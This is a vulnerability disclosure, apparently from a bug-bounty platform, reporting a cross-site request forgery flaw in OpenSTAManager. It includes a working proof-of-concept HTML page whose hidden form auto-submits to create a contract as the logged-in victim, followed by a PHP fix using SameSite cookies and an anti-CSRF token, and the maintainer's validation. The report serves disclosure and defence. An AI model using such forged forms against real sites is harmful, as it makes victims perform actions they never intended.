Cross-Site Request Forgery (CSRF) in devcode-it/openstamanager

Valid

Reported on

Jul 31st 2021


✍️ Description

An attacker is able to create an arbitrary Contract in OpenSTAManager if a logged-in user visits an attacker-controlled site: the browser attaches the victim's session cookie to the cross-site form POST, and the application accepts it without any anti-CSRF check.

🕵️‍♂️ Proof of Concept

1. While logged in to OpenSTAManager, open PoC.html in Firefox or Safari.

2. Check the Contracts module: a Contract named aaaa has been created.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/openstamanager/controller.php?id_module=31" method="POST">
      <input type="hidden" name="id&#95;module" value="31" />
      <input type="hidden" name="id&#95;plugin" value="" />
      <input type="hidden" name="op" value="add" />
      <input type="hidden" name="backto" value="record&#45;edit" />
      <input type="hidden" name="id&#95;record" value="" />
      <input type="hidden" name="nome" value="aaaa" />
      <input type="hidden" name="idanagrafica" value="4" />
      <input type="hidden" name="hash" value="&#35;tab&#95;0" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

This vulnerability allows an attacker to create arbitrary Contracts on behalf of any logged-in user who visits a malicious page.

Fix

Set the SameSite attribute of the session cookie to Lax or Strict, so the browser does not attach it to cross-site POST requests.
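The following is an added example, not code from OpenSTAManager or from the report's author, showing what that fix looks like in PHP (7.3 or later, which is when session_set_cookie_params gained the samesite option) together with a synchronizer token as defence in depth. The csrf_token and csrf_token_is_valid helpers and the simplified dispatch around the op=add parameter are assumptions for illustration; the real controller's structure is not shown on this page.

```php
<?php
// Added example (not OpenSTAManager's own code): harden the session cookie
// against cross-site form posts and add a per-session anti-CSRF token.
// Requires PHP >= 7.3 for the 'samesite' key in session_set_cookie_params().

// 1. Session cookie flags. SameSite=Strict tells the browser not to send the
//    cookie on any request initiated from another site, so a forged POST like
//    the PoC above arrives without a session and is rejected as unauthenticated.
//    Lax also blocks cross-site POSTs but still sends the cookie on top-level
//    GET navigations, which is why state changes must never happen on GET.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'domain'   => '',
    'secure'   => true,     // only transmitted over HTTPS
    'httponly' => true,     // not readable from JavaScript
    'samesite' => 'Strict',
]);
session_start();

// 2. Synchronizer token: a random per-session secret embedded in every
//    state-changing form. Kept in addition to the cookie flag, because the
//    flag alone does nothing on clients that ignore SameSite.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session copy.
// Returns true only when a token was submitted and it matches exactly.
function csrf_token_is_valid(?string $submitted): bool
{
    if ($submitted === null || $submitted === '' || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// 3. Gate every state-changing operation (the PoC's op=add, for instance) on
//    the token. Hypothetical dispatch used here for illustration only.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_token_is_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // ... perform the requested operation ($_POST['op']) here ...
}
?>
<!-- The legitimate form carries the token; a cross-site page cannot read it
     and therefore cannot reproduce a request that passes the check. -->
<form action="controller.php?id_module=31" method="POST">
    <input type="hidden" name="csrf_token"
           value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
    <input type="hidden" name="op" value="add">
    <input type="text" name="nome">
    <input type="submit" value="Save">
</form>
```

With these settings in place, replaying the report's PoC.html from a different origin fails twice over: the browser omits the session cookie because of SameSite=Strict, and even if it did not, the POST lacks a valid csrf_token and is refused with a 403.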

Occurrences

We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back 4 months ago
devcode-it/openstamanager maintainer
4 months ago

Maintainer


Hi. On which version are you trying this? We added same_cookie strict settings in April 2020 and removed them just about 5 days ago for testing.

amammad
4 months ago

Researcher


Hey man, how are you?

Yeah, sorry, my bad.

I downloaded the last release, named 2.4.24.

amammad
4 months ago

Researcher


https://github.com/devcode-it/openstamanager/blob/40ba5847d1fd96b3cd074cc6d93af87aa7773e4f/core.php#L58 this file was already edited 4 days ago, and the strict setting is commented out here ....

amammad
4 months ago

Researcher


In this commit you commented out the SameSite attribute:

https://github.com/devcode-it/openstamanager/commit/5135a2c04cd61c28e05ba6689d8943e4ec32f27c#diff-12c64b5df81f5ee6cf28ade08b1cb9e33d1e43339aa7c2aba61128d1bb57c83a

Please accept my report, as your last release is vulnerable.

devcode-it/openstamanager maintainer validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
loviuz submitted a
4 months ago
devcode-it/openstamanager maintainer confirmed that a fix has been merged on 402dca 4 months ago
loviuz has been awarded the fix bounty